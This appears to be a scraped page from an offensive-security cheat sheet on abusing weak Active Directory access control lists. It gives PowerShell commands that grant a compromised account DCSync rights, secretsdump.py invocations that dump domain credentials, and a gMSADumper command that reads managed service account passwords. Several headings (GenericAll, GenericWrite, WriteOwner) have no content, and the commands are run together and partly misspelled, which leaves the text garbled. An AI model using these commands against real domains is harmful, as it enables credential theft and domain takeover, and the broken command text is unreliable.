Abuse Weak Access Control Lists (ACLs)
Write DACL
$SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUser,$SecPasswordAdd-ObjectACL -PrincipalIdentity compromiseduser -Credential $cred -Rights DCSyncsecretsdumps.py $domain/user@$ipGetChangesAll (DCSync)
secretsdump.py domain/user@ipReadGMSApassword
Remotely
python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p PasswordLocally
ForceChangePassword
GenericAll
GenericWrite
OR
WriteOwner
Automation
Last updated